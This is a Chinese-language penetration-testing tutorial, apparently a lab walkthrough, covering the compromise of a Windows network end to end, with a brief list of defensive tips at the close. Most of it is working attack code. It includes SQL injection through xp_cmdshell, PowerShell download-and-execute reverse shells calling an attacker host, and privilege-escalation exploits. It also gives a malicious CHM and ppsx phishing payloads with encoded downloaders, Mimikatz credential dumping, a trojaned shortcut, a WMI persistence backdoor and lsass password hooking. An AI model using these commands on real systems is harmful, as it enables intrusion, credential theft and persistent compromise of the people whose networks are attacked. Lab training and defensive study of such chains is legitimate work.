渗透测试实战教学文档<\/h1>

0x01 前渗透阶段<\/h2>

网络拓扑分析<\/h3>

外网网段<\/strong>: 10.101.101.0\/24<\/li>
应用服务器内网<\/strong>: 192.168.101.0\/24<\/li>
办公内网<\/strong>: 192.168.111.0\/24<\/li>

访问规则<\/strong>:

企业内网可无限制访问外网，外网无法访问内网<\/li>
办公网可无限制访问应用服务器网络，反之不行<\/li> <\/ul> <\/li> <\/ul>
初始信息收集<\/h3>

端口扫描<\/strong>发现目标10.101.101.13开放80、82端口，系统为Win2008<\/li>
SQL注入检测<\/strong>:

版本探测: http:\/\/10.101.101.13\/?page=1 and @@version>0 --<\/code><\/li>
权限检测: http:\/\/10.101.101.13\/?page=1;if IS_SRVROLEMEMBER('sysadmin')=1 waitfor delay '0:0:5' --<\/code> (有延时表示DBA权限)<\/li> <\/ul> <\/li> <\/ol> 利用SQL注入获取系统权限<\/h3> 启用xp_cmdshell<\/strong>: EXEC<\/span> sp_configure 'show advanced options'<\/span>,1<\/span>;RECONFIGURE; <\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>,1<\/span>;RECONFIGURE; <\/span><\/span><\/code><\/pre><\/li> 创建临时表执行命令<\/strong>: create<\/span> table<\/span> temp(id int identity<\/span>(1<\/span>,1<\/span>),a varchar(8000<\/span>)); <\/span><\/span>insert<\/span> into<\/span> temp exec<\/span> master.dbo.xp_cmdshell 'ipconfig \/all'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 读取命令结果<\/strong>: http:\/\/10.101.101.13\/?page=1 and (select substring((select a from temp for xml auto),1,4000))>0--<\/code><\/li> <\/ol> 反弹Shell尝试<\/h3> 使用Nishang的PowerShell TCP反弹脚本: exec<\/span> master..xp_cmdshell 'powershell IEX (New-Object Net.WebClient).DownloadString("http:\/\/10.101.101.13\/Invoke-PowerShellTcp.ps1");Invoke-PowerShellTcp -Reverse -IPAddress 10.101.101.13 -port 8888'<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 提权尝试<\/h3> 使用ms15-051漏洞: IEX (New-Object Net.WebClient).DownloadString('http:\/\/10.101.101.13\/Invoke-ReflectivePEInjection.ps1'<\/span>); <\/span><\/span>Invoke-ReflectivePEInjection -PEUrl http:<\/span>\/\/10.101.101.13\/x86\/ms15-051.exe -ExeArgs "cmd"<\/span> -ForceA <\/span><\/span><\/code><\/pre><\/li> <\/ol> 内网探测<\/h3> 使用Metasploit模块: use auxiliary\/scanner\/smb\/smb_version<\/code> 扫描SMB服务<\/li> use auxiliary\/scanner\/portscan<\/code> 扫描端口<\/li> <\/ul> <\/li> <\/ol> 82端口发现<\/h3> 发现后台弱口令，进入后修改静态页面存储路径为1.asp<\/li> 插入木马代码，重新生成静态页面获取WebShell<\/li> <\/ol> 钓鱼攻击准备<\/h3> CVE-2017-8570漏洞利用<\/strong>:<\/p> 生成恶意ppsx文件: python cve-2017-8570_toolkit.py -M gen -w car.ppsx -u http:\/\/10.101.101.16:82\/logo.doc <\/span><\/span><\/code><\/pre><\/li> 启动漏洞利用服务: python cve-2017-8570_toolkit.py -p 82<\/span> -M exp -e 10.101.101.16 <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 恶意CHM文件制作<\/strong>:<\/p> 使用Easy CHM制作包含恶意代码的CHM文件<\/li> 代码示例: <OBJECT<\/span> id<\/span>=<\/span>x<\/span> classid<\/span>=<\/span>"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"<\/span> width<\/span>=<\/span>1<\/span> height<\/span>=<\/span>1<\/span>> <\/span><\/span> <PARAM<\/span> name<\/span>=<\/span>"Command"<\/span> value<\/span>=<\/span>"ShortCut"<\/span>> <\/span><\/span> <PARAM<\/span> name<\/span>=<\/span>"Button"<\/span> value<\/span>=<\/span>"Bitmap::shortcut"<\/span>> <\/span><\/span> <PARAM<\/span> name<\/span>=<\/span>"Item1"<\/span> value<\/span>=<\/span>",rundll32.exe,javascript:'\..\mshtml,RunHTMLApplication';new%20ActiveXObject('WScript.Shell').Run('cmd \/c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwADEALgAxADAAMQAuADEANgAvAGMAaABtAC4AcABzADEAJwApAA==',0,false);self.close();',0,false);"<\/span>> <\/span><\/span><\/OBJECT<\/span>> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 伪造邮件发送<\/strong>:<\/p> 使用swaks工具发送钓鱼邮件<\/li> <\/ul> <\/li> <\/ol> 0x02 后渗透阶段<\/h2> 权限提升<\/h3> Mimikatz使用<\/strong>: IEX (New-Object Net.WebClient).DownloadString('http:\/\/10.101.101.16\/nishang\/Gather\/Invoke-Mimikatz.ps1'<\/span>); <\/span><\/span>Invoke-Mimikatz <\/span><\/span><\/code><\/pre><\/li> <\/ol> 持久化控制<\/h3> 恶意快捷方式制作<\/strong>: 替换远程桌面快捷方式<\/li> 隐藏执行键盘记录和屏幕截图<\/li> 代码示例: $WshShell = New-Object -comObject WScript.Shell <\/span><\/span>$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\Remote Desktop.lnk"<\/span>) <\/span><\/span>$Shortcut.TargetPath = "C:\Windows\System32\rundll32.exe"<\/span> <\/span><\/span>$Shortcut.Arguments = 'javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd \/c powershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(''http:\/\/10.101.101.16\/rlnk.ps1''))",0,true);self.close();'<\/span> <\/span><\/span>$Shortcut.IconLocation = "C:\Windows\system32\SHELL32.dll,21"<\/span> <\/span><\/span>$Shortcut.Save() <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 域渗透<\/h3> MS14-068漏洞利用<\/strong>: goldenPac.py diattack.com\/jack:jackpwd@dns.diattack.com <\/span><\/span><\/code><\/pre><\/li> 64位PowerShell反弹<\/strong>: C:\/\/Windows\/\/SysNative\/WindowsPowerShell\/\/v1.0\/\/powershell.exe IEX (New-Object Net.WebClient).DownloadString('http:\/\/10.101.101.16\/nishang\/Shells\/Invoke-PowerShellTcp.ps1'<\/span>);Invoke-PowerShellTcp -Reverse -IPAddress 10.101.101.16 -port 8888 <\/span><\/span><\/code><\/pre><\/li> <\/ol> 后门安装<\/h3> WMI持久化后门<\/strong>:<\/p> 使用mof文件每分钟执行一次payload<\/li> 示例mof文件: <?xml version="1.0"?><\/span> <\/span><\/span><package><\/span> <\/span><\/span> <component<\/span> id=<\/span>"testCalc"<\/span>><\/span> <\/span><\/span> <script<\/span> language=<\/span>"JScript"<\/span>><\/span> <\/span><\/span> <![CDATA[ <\/span><\/span><\/span> var r = new ActiveXObject("WScript.Shell").Run("powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwADEALgAxADAAMQAuADEANgAvAGMAaABtAC4AcABzADEAJwApAA==",0,true); <\/span><\/span><\/span> ]]><\/span> <\/span><\/span> <\/script><\/span> <\/span><\/span> <\/component><\/span> <\/span><\/span><\/package><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 密码更改监控<\/strong>:<\/p> 使用HookPasswordChangeNotify技术<\/li> 代码示例: IEX (New-Object System.Net.WebClient).DownloadString("http:\/\/10.101.101.16\/HookPasswordChangeNotify.ps1"<\/span>) <\/span><\/span>Invoke-ReflectivePEInjection -PEUrl http:<\/span>\/\/10.101.101.16\/HookPasswordChange.dll –<\/span>procname lsass <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 关键工具和资源<\/h2> 工具集合<\/strong>:<\/p> Nishang: https:\/\/github.com\/samratashok\/nishang<\/li> PowerSploit: https:\/\/github.com\/PowerShellMafia\/PowerSploit<\/li> CVE-2017-8570利用工具: https:\/\/github.com\/niexinming\/safe_tool<\/li> <\/ul> <\/li> 参考文章<\/strong>:<\/p> CVE-2017-8570分析: http:\/\/www.freebuf.com\/vuls\/144054.html<\/li> MS14-068利用: http:\/\/note.youdao.com\/share\/?id=1fe30438ec6ccd66e67c3d1ffdd8ae35&type=note<\/li> WMI后门: http:\/\/www.moonsec.com\/post-621.html<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 及时安装系统补丁<\/li> 禁用不必要的系统功能如xp_cmdshell<\/li> 加强密码策略，避免弱口令<\/li> 限制PowerShell执行权限<\/li> 监控WMI事件和异常进程<\/li> 教育员工识别钓鱼攻击<\/li> 实施网络分段和访问控制<\/li> <\/ol>